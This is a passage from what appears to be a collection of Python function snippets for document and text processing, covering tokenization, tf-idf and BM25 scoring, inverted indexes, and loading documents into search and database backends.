len(sub_tokens) > MAX_LENGTH:\n # print(len(sub_tokens))\n # MAX_LENGTH = len(sub_tokens)\n # print(MAX_LENGTH)\n # todo(yuxian): need pad speakers?\n speakers = {subtoken_map.index(word_index): tokenizer.tokenize(speaker)\n for word_index, speaker in doc_info['speakers']}\n clusters = [[(subtoken_map.index(start), len(subtoken_map) - 1 - subtoken_map[::-1].index(end))\n for start, end in cluster] for cluster in doc_info['clusters']]\n tokenized_document = {'sub_tokens': sub_tokens, 'sentence_map': sentence_map, 'subtoken_map': subtoken_map,\n 'speakers': speakers, 'clusters': clusters, 'doc_key': doc_info['doc_key']}\n return tokenized_document", "def replace_words_fun(self):\n\n cleaned_doc = []\n for word in str(self.doc).split():\n if word.lower() 
in self.replacement_list.keys():\n cleaned_doc.append(self.replacement_list[word.lower()])\n else:\n cleaned_doc.append(word)\n self.doc = ' '.join(cleaned_doc)", "def get_idf_dict(clean_corpus, tf_list, num_docs):\n \n idf_dict = {}\n for i in range(num_docs):\n for key in tf_list[i].keys():\n if key not in idf_dict.keys():\n idf_dict[key] = 0\n idf_dict[key] = idf_dict[key] + 1\n \n for key in idf_dict.keys():\n idf_dict[key] = math.log2(num_docs/idf_dict[key])\n # idf_dict's keys -> all unique tokens in the corpus \n return idf_dict", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def create_tokens_li():\n cnt=0\n for file in docs:\n file_name = open(\"./corpus/\"+ str(file) + \".txt\")\n print(cnt)\n cnt+=1\n words = file_name.read()\n tokens_doc = nltk.word_tokenize(words)\n tokens_doc = [w.lower() for w in tokens_doc]\n #tokens_doc = [snowball_stemmer.stem(token) for token in tokens_doc]\n tokens_doc = [token for token in tokens_doc if token not in nltk.corpus.stopwords.words('english')]\n tokens_li.append(tokens_doc)\n\n\n #storing in json file\n with open('savers/tokens.json', 'w') as fp:\n json.dump(tokens_li, fp)", "def documents(self, documents):\n\n self._documents = documents", "def documents_to_dict(documents: List[Dict]) -> Dict[str, Dict]:\n res = {}\n for doc in documents:\n res[doc['id']] = doc\n return res", "def map_docs(docs_file):\n word_map = defaultdict(int)\n doc_count = 0\n token_count = 0\n\n for _, doc_tokens in tokenize(docs_file):\n doc_count += 1 # count document\n token_count += len(doc_tokens) # count tokens\n for token in set(doc_tokens):\n word_map[token] += 1 # increase inverted index count\n\n docs_file.seek(0) # reset file pointer\n return doc_count, token_count, word_map", "def updateScores(rankedLists):\n docToRank = {}\n for rankedList in rankedLists:\n\n f = open(rankedList, 'r')\n for line in f:\n documentID = line.split()[2]\n docno = documentID\n score = float(line.split()[4])\n position = int(line.split()[3])\n docToRank[docno] = (position,score)\n f.close()\n client = MongoClient('asr2.iem.technion.ac.il',27017)\n db = client.asr16\n documents = db.documents.find({})\n for document in documents:\n key = document[\"query_id\"]+\"-\"+document[\"username\"]\n document['position'] = docToRank[key][0]\n document['score'] = docToRank[key][1]\n document['posted_document'] = document['current_document']\n db.documents.save(document)", "def merge_docs(self):", "def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))", "def make_vocab_from_docs(docs):\n vocab_words=set()\n for doc in docs:\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is 
not a-z or space\n words=set(doc.split())\n vocab_words=vocab_words.union(words)\n vocab=dict(zip(vocab_words,range(len(vocab_words))))\n return vocab", "def _prepare_analysis_input(self, documents):\n subdoc_to_doc_map = {}\n wordtype_to_number = {}\n number_to_wordtype = []\n wordtypes = {}\n \n # prevent duplicating work\n if os.path.exists(self.wordtype_file):\n return\n \n try:\n # First find singletons\n if self.remove_singletons:\n word_type_count_threshold = max(1, int(math.log(documents.count(), 10)) - 2)\n temp_word_type_counts = {}\n for doc_index, doc in enumerate(documents):\n tokens = self.tokenize(doc.get_content())\n for token, token_start in tokens:\n temp_word_type_counts[token] = temp_word_type_counts.setdefault(token, 0) + 1\n for word_type, count in temp_word_type_counts.iteritems(): # add singletons to stopword list\n if count <= word_type_count_threshold:\n self._excluded_words[word_type] = True\n with io.open(self.excluded_words_file, 'w', encoding='utf-8') as ex_f:\n ex_f.write(unicode(json.dumps(self._excluded_words)))\n \n haltwords = dict(self.stopwords)\n haltwords.update(self._excluded_words)\n # Second find bigrams, iterate through documents and train.\n if self.find_bigrams:\n from import_tool.analysis.bigram_finder import BigramFinder\n bigram_finder = BigramFinder(stopwords=haltwords)\n for doc_index, doc in enumerate(documents):\n bigram_finder.train(doc_index, self.tokenize(doc.get_content()))\n bigram_finder.print()\n \n # Third, we're going to stem words\n if self.stem_words:\n from import_tool.analysis.stemmer import Stemmer\n stemmer = Stemmer(self._working_dir, self.base_dir)\n \n # for each document tokenize and map tokens to numbers to avoid regex problems before passing data to Mallet\n with io.open(self.mallet_input_file, 'w', encoding='utf-8') as w:\n with io.open(self.start_index_file, 'w', encoding='utf-8') as w2:\n count = 0\n subcount = 0\n for doc_index, doc in enumerate(documents):\n doc_content = unicode(doc.get_content())\n count += 1\n subdocuments = self.create_subdocuments(doc_index, doc_content)\n token_start_index_offset = 0 # needed to make sure the start index remains correct once the document is re-merged\n for subdoc_name, subdoc_content in subdocuments:\n if subcount > 0:\n w2.write(u'\\n')\n subcount += 1\n subdoc_to_doc_map[subdoc_name] = doc_index\n tokens = self.tokenize(subdoc_content)\n \n if self.find_bigrams:\n tokens = bigram_finder.combine(tokens, subdoc_content)\n \n token_numbers = []\n token_start_indices = []\n only_tokens = []\n tokens_temp = []\n for tok, tok_start in tokens:\n only_tokens.append(tok)\n tokens_temp.append([tok, tok_start + token_start_index_offset])\n tokens = tokens_temp\n tokens_temp = None\n if self.stem_words:\n stemmed_tokens = stemmer.stem(only_tokens)\n else:\n stemmed_tokens = only_tokens\n for tup, tok_stem in zip(tokens, stemmed_tokens):\n tok, tok_start = tup\n wordtypes[tok] = True\n wordtypes[tok_stem] = True\n try:\n tok_num = wordtype_to_number[tok_stem]\n except:\n tok_num = len(wordtype_to_number)\n number_to_wordtype.append(tok_stem)\n wordtype_to_number[tok_stem] = tok_num\n token_numbers.append(unicode(tok_num))\n token_start_indices.append([tok, tok_start])\n text = u' '.join(token_numbers)\n w.write(u'{0} all {1}\\n'.format(subdoc_name, text))\n w2.write(unicode(json.dumps(token_start_indices)))\n token_start_index_offset += len(subdoc_content)\n for tok, tok_start in tokens:\n try:\n assert doc_content[tok_start:tok_start+len(tok)].lower() == tok.lower()\n except:\n 
print(tok_start)\n print(len(tok))\n print('\"'+doc_content[tok_start:tok_start+len(tok)].lower()+'\"')\n print('\"'+tok.lower()+'\"')\n raise\n if not count:\n raise Exception('No files processed.')\n # record which subdocuments belong to which documents\n with io.open(self.subdoc_to_doc_map_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(subdoc_to_doc_map)))\n with io.open(self.wordtype_to_number_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtype_to_number)))\n with io.open(self.number_to_wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(number_to_wordtype)))\n with io.open(self.wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtypes)))\n except: # cleanup\n self._cleanup(self.mallet_input_file)\n self._cleanup(self.subdoc_to_doc_map_file)\n self._cleanup(self.wordtype_to_number_file)\n self._cleanup(self.number_to_wordtype_file)\n self._cleanup(self.wordtype_file)\n self._cleanup(self.excluded_words_file)\n raise", "def current_word_PL(current_word, file_reader_last_read_list, doc_dict, nb_doc):\n word_posting_list = {} # { key = doc , value = score }\n for idx, file_reader_last_read in enumerate(file_reader_last_read_list):\n if file_reader_last_read[\"last_read\"][\"word\"] == current_word:\n docs = file_reader_last_read[\"last_read\"][\"doc_score_list\"]\n add_doc_in_posting_list(word_posting_list=word_posting_list, docs=docs)\n file_reader_last_read_list[idx]=read_line_and_update(file_reader_and_last_read=file_reader_last_read)\n for key, value in word_posting_list.items():\n tf = float(value) / doc_dict[int(key)]\n idf = math.log((float(nb_doc)/len(word_posting_list)),2)\n score = tf*idf\n word_posting_list[key]=score \n word_posting_list = sort_and_cast_doc_in_posting_list(word_posting_list=word_posting_list)\n return word_posting_list", "async def put_documents(self, collection, documents):\n await self.ensure_collection(collection)\n try:\n if SOLR_COMMIT_WITHIN:\n params = {'commitWithin': SOLR_COMMIT_WITHIN}\n else:\n params = {'commit': 'true'}\n await self.post(\n '/v2/collections/{}/update'.format(collection),\n params=params, json_data=documents\n )\n logger.info('Successfully indexed {} documents to collection {}'\n .format(len(documents), collection))\n except SolrError:\n logger.warning('Failed to put {} documents to collection {}'\n .format(len(documents), collection))\n raise", "def from_documents(cls, documents):\n # return cls.from_words(_itertools.chain(*documents))\n return cls.from_words(\n cls._build_new_documents(documents, cls.default_ws, pad_right=True)\n )", "def add_new_doc(self, document, end_of_corpus):\n max_tf = 0\n unique_terms_counter = 0\n document_dictionary = document.term_doc_dictionary\n # Go over each term in the doc\n for term in document_dictionary:\n try:\n # Update inverted index and posting\n if term not in self.inverted_idx:\n self.inverted_idx[term] = 1\n unique_terms_counter += 1\n else:\n self.inverted_idx[term] += 1\n if term not in self.posting_dict:\n self.posting_dict[term] = []\n\n self.posting_dict[term].append(\n (document.tweet_id, document_dictionary[term])) # key: str , value: array of tuples\n\n max_tf = max(document_dictionary[term], max_tf)\n\n except:\n\n print('problem with the following key {}'.format(term[0]))\n\n document.max_tf = max_tf\n document.unique_terms = unique_terms_counter\n self.docs_count += 1\n\n modulo = int(document.tweet_id) % 10\n self.documents[modulo][document.tweet_id] = [document.term_doc_dictionary, 
document.max_tf]\n\n if self.docs_count == self.DOCS_SIZE or end_of_corpus: # if we reach chunk size or end of corpus\n self.add_to_file(end_of_corpus)\n self.docs_count = 0\n self.posting_dict = {}\n\n for i in self.documents: # 0 - 9\n if self.documents[i].__len__() > 15000:\n doc = utils.load_obj(self.out + \"document\" + str(i))\n doc.update(self.documents[i])\n utils.save_obj(doc, self.out + \"document\" + str(i))\n self.documents[i] = {}", "def upload(self, documents: List[Document], vectorise_func) -> None:\n\n # Add doc_store to documents\n for d in documents:\n d.doc_store = self\n # Check ID uniqueness\n check_duplicate_documents(documents)\n # Check type consistency\n check_document_types(documents)\n # Batching\n batches = batch_items(documents)\n\n # Update document class conveniently\n if issubclass(type(documents[0]), ChunkedDocument):\n self._doc_class = ChunkedDocument\n\n for batch in batches:\n vectorise_func(batch, self)\n self.documents += batch", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def _merge_conllu_subtokens(self, lines: List[str], doc: Doc)-> Doc:\n # identify and process all subtoken spans to prepare attrs for merging\n subtok_spans = []\n for line in lines:\n parts = line.split(\"\\t\")\n id_, word, lemma, pos, tag, morph, head, dep, _1, misc = parts\n if \"-\" in id_:\n subtok_start, subtok_end = id_.split(\"-\")\n subtok_span = doc[int(subtok_start) - 1 : int(subtok_end)]\n subtok_spans.append(subtok_span)\n # create merged tag, morph, and lemma values\n tags = []\n morphs = {}\n lemmas = []\n for token in subtok_span:\n tags.append(token.tag_)\n lemmas.append(token.lemma_)\n if token._.merged_morph:\n for feature in token._.merged_morph.split(\"|\"):\n field, values = feature.split(\"=\", 1)\n if field not in morphs:\n morphs[field] = set()\n for value in values.split(\",\"):\n morphs[field].add(value)\n # create merged features for each morph field\n for field, values in morphs.items():\n morphs[field] = field + \"=\" + \",\".join(sorted(values))\n # set the same attrs on all subtok tokens so that whatever head the\n # retokenizer chooses, the final attrs are available on that token\n for token in subtok_span:\n token._.merged_orth = token.orth_\n token._.merged_lemma = \" \".join(lemmas)\n token.tag_ = \"_\".join(tags)\n token._.merged_morph = \"|\".join(sorted(morphs.values()))\n token._.merged_spaceafter = (\n True if subtok_span[-1].whitespace_ else False\n )\n\n with doc.retokenize() as retokenizer:\n for span in subtok_spans:\n retokenizer.merge(span)\n\n return doc", "def _apply_mapping(self, document, mapping):\n if not mapping:\n return document\n new_document = {v: document[k] for k, v in mapping.items() if k in document}\n # Keep track of missing keys\n self.missing_keys.update([k for k in mapping if k not in document])\n\n # Document errors for missing documents\n if not new_document:\n self.failed += 1\n self.failed_ids.append(\n document.get(\"id\", document.get(\"ID\", document.get(\"_id\", None)))\n )\n return new_document", "def count_doc_frequencies(self, docs):\n frequencyIndex = {}\n doc_id = 0\n for doc in 
docs:\n for term in doc:\n if term not in frequencyIndex:\n frequencyIndex[term] = [doc_id]\n else:\n for id in frequencyIndex[term]:\n if doc_id == id:\n break\n else:\n frequencyIndex[term].append(doc_id)\n doc_id+=1\n\n for term in frequencyIndex:\n occurences = len(frequencyIndex[term])\n frequencyIndex[term] = occurences\n\n return frequencyIndex", "def set_documents(cls, input_list_text: List[str]) -> None:\n cls.documents = input_list_text", "def featurize(movies):\n ###TODO \n movies['features'] = \"\" \n get_h = set() \n vocab_dict = {}\n df_dict_return = {}\n tup_list = []\n index_dict = {}\n index_dict_1 = {}\n movie_len = len(movies) \n #print(\"MovieLength::\",movie_len)\n #print(\"MOVIES:::\",movies)\n \n get_h = cal_unique_features(movies) # num_features\n\n vocab_dict = cal_unique_vocab(get_h) # vocab complete\n\n len_vocab = len(get_h)\n \n df_dict_return = cal_unique_docs(get_h,movies) # df(i)\n\n for token in get_h :\n #tup_list.clear()\n #print(\"token_GOTTTTT:::\",token)\n for index,row in movies.iterrows(): \n #print(\"row_got::\",row)\n gen_list = row['tokens']\n #print(\"gen_list::\",gen_list)\n #mov_id = row['movieId'] \n #print(\"mov_id::\",mov_id)\n token_count_1 = Counter(gen_list).most_common()[:1]\n tok = token_count_1[0]\n index_dict_1[index] = tok[1]\n token_count = gen_list.count(token)\n #print(\"token_count::\",token_count)\n tup = (index,token_count)\n #print(\"tuple::\",tup)\n tup_list.append(tup)\n #print(\"LIST_PRINT:::::::::::::\",tup_list)\n index_dict[token] = tup_list\n tup_list = []\n \n \n #print(\"INDEX_DICT:::\",index_dict) # tf(i,d)\n #print(\"INDEX_DICT_1:::\",index_dict_1) # max_k dict per docx\n \n \n for ind, row in movies.iterrows():\n data_list = []\n rows_list = []\n columns_list = []\n gen_list = row['tokens']\n #print(\"TOKENS GOTTT::\",gen_list) \n for gen in gen_list:\n tf = get_tf_value(index_dict,gen,ind)\n #print(\"TF GOTTT::\",tf) \n tf_weight = float( tf / index_dict_1[ind])\n #print(\"tf_weight::\",tf_weight)\n df_weight = float( math.log10( movie_len / df_dict_return[gen] ) )\n #print(\"df_weight::\",df_weight)\n final_tfidf = tf_weight * df_weight\n #print(\"final_tfidf::\",final_tfidf)\n data_list.append(final_tfidf)\n columns_list.append(vocab_dict[gen])\n rows_list.append(0) \n csr = csr_matrix((data_list, (rows_list,columns_list)), shape=(1,len_vocab))\n #print(\"TYPE of CSR GOTT::\",type(csr))\n #print(\"CSR GOTT:::\",csr) \n movies.set_value(ind, 'features', csr)\n \n #print(\"UPDATE movies::\",movies) \n\n return(movies,vocab_dict)\n \n\n pass", "def index_terms(self):\n [[self.set_postings(term, id) for term in NLProcessor.process(doc)] for id, doc in\n self.doc_store.dict.iteritems()]", "def updateWordCounts():\n emaildata = loadEmailData()\n englishwords = importDictionary()\n countAllWords(emaildata, englishwords)", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def update(self, docs: DocumentArray, *args, **kwargs):\n cursor = self.connection.cursor()\n psycopg2.extras.execute_batch(\n cursor,\n f'UPDATE {self.table} SET DOC = %s WHERE ID = %s',\n [\n (\n doc.SerializeToString(),\n doc.id,\n )\n for doc in docs\n ],\n )\n self.connection.commit()", "def 
updateWordList(emailids):\n with open('res/dictionary.txt', 'r') as f:\n lines = f.readlines()\n words = set([line.strip() for line in lines])\n\n with open('res/dictionary.txt', 'a') as f:\n for emailid in emailids: \n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)", "def add_documents(self, docs):\n for doc in docs:\n assert isinstance(doc, pylastica.document.Document), \"All items in list docs must be of type Document: %r\" % doc\n doc.doc_type = self.name\n return self.index.add_documents(docs)", "def update_documents(self, engine_name, documents):\n endpoint = \"engines/{}/documents\".format(engine_name)\n data = json.dumps(documents)\n\n return self.swiftype_session.request('patch', endpoint, data=data)", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def index_feats_dict(self):\n doc_features_dict = {}\n\n for index, doc in zip(self.index, self.series):\n # Sets for a doc and feature words\n doc_set = set(doc.split())\n feat_set = set(self.features)\n\n # Shared words between the two sets\n interset_words = doc_set.intersection(feat_set)\n\n # Append to doc_features_dict\n doc_features_dict[index] = list(interset_words)\n\n return doc_features_dict", "def pos():\n pos_list = []\n for token in doc:\n pos_list.append(token.pos_)\n setList = list(set(pos_list))\n my_dict = {i: pos_list.count(i) for i in setList}\n print(my_dict)", "def finish_documents():\n\n doc_ids = json.loads(request.form['doc_ids'])\n\n for docid in doc_ids:\n\n document = Document.query.filter_by(id=docid).first_or_404()\n\n document.status = \"OK\"\n\n db.session.add(document)\n\n db.session.commit()", "def test_update_list(self):\n u = stellr.UpdateCommand(TEST_HTTP)\n docs = [{'a': 1}, {'b': 2}]\n u.add_documents(docs)\n self.assertEqual(2, len(u._commands))\n self.assertEqual(u.body,\n ('{\"add\": {\"doc\": {\"a\": 1}}'\n ',\"add\": {\"doc\": {\"b\": 2}}}'))", "def add_documents(self, documents):\n\t\t\n\t\t# flag for StopIteration exceptions\n\t\tmore_documents = True\n\t\t# loop while there are still documents in the iterator\n\t\twhile more_documents:\n\t\t\t# increment batch number\n\t\t\tbatch = len(self.batch_stats) + 1\n\t\t\t# count sentences\n\t\t\tsentences_count = 0\n\t\t\t# create temporary batch data file in the version directory\n\t\t\tbatch_file = os.path.join(self.file_base.get_version_path(self.version), \"data.jl.gz.temp\")\n\t\t\t# try to read the next batch of files, catch exception and stop if there are no more\n\t\t\ttry:\n\t\t\t\t# get next document before opening the file just to make sure it's there\n\t\t\t\tdocument = documents.next()\n\t\t\t\t# open the data file\n\t\t\t\twith gzip.open(batch_file, \"wb\") as outfile:\n\t\t\t\t\t# loop through DOCUMENT_BATCH_SIZE documents\n\t\t\t\t\tfor i in range(DocumentDatabase.DOCUMENT_BATCH_SIZE):\n\t\t\t\t\t\t# count sentences in document\n\t\t\t\t\t\tfor paragraph in document[\"paragraphs\"]:\n\t\t\t\t\t\t\tsentences_count += len(paragraph[\"sentences\"])\n\t\t\t\t\t\t# write JSON to file one line at a 
time\n\t\t\t\t\t\toutfile.write(\"%s\\n\" % json.dumps(document))\n\t\t\t\t\t\t# if we are not done with this batch, retrieve the next document\n\t\t\t\t\t\tif i < DocumentDatabase.DOCUMENT_BATCH_SIZE - 1:\n\t\t\t\t\t\t\tdocument = documents.next()\n\t\t\texcept StopIteration:\n\t\t\t\t# the end of the documents stream, set the flag to False\n\t\t\t\tmore_documents = False\n\t\t\t# make sure the batch isn't empty\n\t\t\tif sentences_count > 0:\n\t\t\t\t# create the new batch in the file system\n\t\t\t\tself.version_batches.create_latest_version()\n\t\t\t\t# add the stats to the statistics hash\n\t\t\t\tself.batch_stats[batch] = BatchStats(sentences_count)\n\t\t\t\t# write the batch statistics to file\n\t\t\t\twith codecs.open(self._get_batch_stat_file(batch), \"wb\", \"utf-8\") as outfile:\n\t\t\t\t\t# write the JSON representation for the stats\n\t\t\t\t\toutfile.write(json.dumps(self.batch_stats[batch].to_json()))\n\t\t\t\t# move the temp data file to the correct location inside the version folder\n\t\t\t\tos.rename(batch_file, self._get_batch_file(batch))", "def get_preprocessed_docs(formatted_docs):\r\n preprocessed_docs = {}\r\n for idx in formatted_docs.keys():\r\n preprocessed_docs[idx] = preprocess(formatted_docs[idx])\r\n return preprocessed_docs", "def load_flattened_documents(data_dir: str, docids: Set[str]) -> Dict[str, List[str]]:\n unflattened_docs = load_documents(data_dir, docids)\n flattened_docs = dict()\n for doc, unflattened in unflattened_docs.items():\n flattened_docs[doc] = list(chain.from_iterable(unflattened))\n return flattened_docs", "def build(self,documents):\n\t\tself.vectorKeywordIndex = self.getVectorKeywordIndex(documents)\n\n\t\tself.documentVectors = [self.createVector(document) for document in documents]", "def _build_token_dict(self, corpus: List[List[str]], min_count: int = 3):\n token2idx = {\n self.token_pad: 0,\n self.token_unk: 1,\n self.token_bos: 2,\n self.token_eos: 3\n }\n\n token2count = {}\n for sentence in corpus:\n for token in sentence:\n count = token2count.get(token, 0)\n token2count[token] = count + 1\n\n # 按照词频降序排序\n sorted_token2count = sorted(token2count.items(),\n key=operator.itemgetter(1),\n reverse=True)\n token2count = collections.OrderedDict(sorted_token2count)\n\n for token, token_count in token2count.items():\n if token not in token2idx and token_count >= min_count:\n token2idx[token] = len(token2idx)\n\n self.token2idx = token2idx\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def update_words(data, book_num):\n\tglobal word_count\n\t#find count of each word in the book and update the dictionary\n\tfor words in data:\n\t\tword_count[words][book_num] = (word_count.get(words,0)[book_num] + 1)\n\t#print(word_count)", "def generate_dict(self):\n dict = defaultdict(list)\n for i in range(self.no_of_docs-1):\n doc_txt = self.doc_to_df(i)\n #assign key to index in dictionary and its locations as tuples(docid,line,wordpos) as the values\n for j in range(len(doc_txt)):\n for k in range(doc_txt.shape[1]):\n key = doc_txt[k][j]\n dict[key].append((i,j,k))", "def set(self, doc, fields_values):\n fields_values = Object.from_bson(fields_values)\n for k,v in fields_values.items():\n self._set(doc, k.split('.'), v)\n impl = self._impl(doc)\n return impl.update({'_id':doc._id}, {'$set':fields_values})", "def parse_doc(self, doc_as_list):\n tweet_id = 
doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n retweet_text = doc_as_list[4]\n retweet_url = doc_as_list[5]\n quote_text = doc_as_list[6]\n quote_url = doc_as_list[7]\n term_dict = {}\n tokenized_text = self.parse_sentence(full_text)\n doc_length = len(tokenized_text) # after text operations.\n\n for i, term in enumerate(tokenized_text):\n if term not in term_dict.keys():\n term_dict[term] = [1, [i]]\n else:\n term_dict[term][0] += 1\n term_dict[term][1].append(i)\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def extract(self, documents):\n\n # Feature vector to return\n features = np.zeros((len(documents), len(self.idx_to_word)))\n\n # Raise an exception if 'extract' is called before 'preprocess'\n if len(self.word_to_idx) == 0 or len(self.idx_to_word) == 0:\n raise Exception(\"Dictionary not initialised.\")\n\n # Iterate over all documents\n for idx, doc in enumerate(documents):\n # Split the doc into a list of words\n words = extract_words(doc)\n\n # For each word\n for w in words:\n # Calculate it's frequency, however, keep in mind\n # that this word may not have been in the training\n # corpus. In that case, ignore the word.\n ''' YOUR CODE HERE '''\n try:\n features[idx][self.word_to_idx[w]] = words.count(w)\n except KeyError:\n pass\n\n ''' END CODE FOR THIS LOOP '''\n\n # Divide the vector by the total number of words in the document to\n # normalize the frequencies.\n ''' YOUR CODE HERE '''\n features[idx] = features[idx]/len(words)\n ''' END CODE FOR THIS LOOP '''\n\n return features", "def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def __call__(self, doc: Doc) -> Doc:\n for val in self._get_vals(doc):\n key = self._get_key(val)\n try:\n self._table.get(key).append(val)\n except AttributeError:\n self._table.set(key, [val])\n self._size += 1\n return super().__call__(doc)", "def __parse_corpus(self, corpus):\n corpus = self.__handle_corpus_unkwon_words(corpus)\n start_token = ' '.join([NGramModel.START_SENTENCE_TOKEN]*(self.__n-1))\n word_list = corpus.replace(NGramModel.START_SENTENCE_TOKEN, start_token).split()\n \n for n in range(1, self.__n+1): \n self.__ngram_counts[n] = {}\n for ngram, count in Counter(self.__generate_n_grams(word_list, n)).items():\n self.__ngram_counts[n][' '.join(ngram)] = count", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def merge_all_claims_norm_dicts_for_docs(): \n# docs_norm_scores_dicts_path = base_path+\"\\\\docs_norm_scores_dicts\"\n docs_norm_scores_dicts_path = linux_base_path+\"/docs_norm_scores_dicts\"\n# all_claims_norms_scores_merged_dict = base_path +\"\\\\all_claims_norms_scores_merged_dict\"\n all_claims_norms_scores_merged_dict = linux_base_path +\"/all_claims_norms_scores_merged_dict\"\n for alpha in range(0,11,1):\n for beta in range(0,10,1):\n 
docs_scores_all_claims = {}\n for filename in os.listdir(docs_norm_scores_dicts_path):\n (alpha_f,beta_f)=turn_to_float([alpha,beta])\n if \"_alpha_\"+str(alpha_f)+\"_\" in filename and \"_beta_\"+str(beta_f)+\"_\" in filename:\n curr_dict = read_pickle(docs_norm_scores_dicts_path+\"/\"+filename)\n docs_scores_all_claims = dict(docs_scores_all_claims.items() + curr_dict.items()) #merge dicts\n save_pickle(all_claims_norms_scores_merged_dict+\"/docs_norm_scores_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f),docs_scores_all_claims)", "def tokenize_replace_pos(doc_list, language_code, replace_pos,\n core_num=multiprocessing.cpu_count()):\n param = [[d, language_code, replace_pos] for d in doc_list]\n pool = multiprocessing.Pool(core_num)\n return pool.map(_tokenize_replace_pos4map, param)", "def refine_tokens( self, tokens ):\n k = 1.75\n b = 0.75\n stop_words_file = \"stop_words.txt\"\n all_stopwords = list()\n refined_tokens_sources = dict()\n \n # collect all the stopwords\n with open( stop_words_file ) as file:\n lines = file.read()\n all_stopwords = lines.split( \"\\n\" )\n \n for source in tokens:\n refined_tokens = dict()\n files = dict()\n inverted_frequency = dict()\n file_id = -1\n total_file_length = 0\n for item in tokens[ source ]:\n file_id += 1\n file_tokens = tokens[ source ][ item ].split(\" \")\n if source in \"name_desc_edam_help\":\n file_tokens = utils._clean_tokens( file_tokens, all_stopwords )\n total_file_length += len( file_tokens )\n term_frequency = dict()\n for token in file_tokens:\n if token is not '':\n file_ids = list()\n if token not in inverted_frequency:\n file_ids.append( file_id )\n else:\n file_ids = inverted_frequency[ token ]\n if file_id not in file_ids:\n file_ids.append( file_id )\n inverted_frequency[ token ] = file_ids\n # for term frequency\n if token not in term_frequency:\n term_frequency[ token ] = 1\n else:\n term_frequency[ token ] += 1\n files[ item ] = term_frequency\n N = len( files )\n average_file_length = float( total_file_length ) / N\n # find BM25 score for each token of each tool. It helps to determine\n # how important each word is with respect to the tool and other tools\n for item in files:\n file_item = files[ item ]\n file_length = len( file_item )\n for token in file_item:\n tf = file_item[ token ]\n # normalize the term freq of token for each document\n tf = float( tf ) / file_length\n idf = np.log2( N / len( inverted_frequency[ token ] ) )\n alpha = ( 1 - b ) + ( float( b * file_length ) / average_file_length )\n tf_star = tf * float( ( k + 1 ) ) / ( k * alpha + tf )\n tf_idf = tf_star * idf\n file_item[ token ] = tf_idf\n # filter tokens based on the BM25 scores and stop words. 
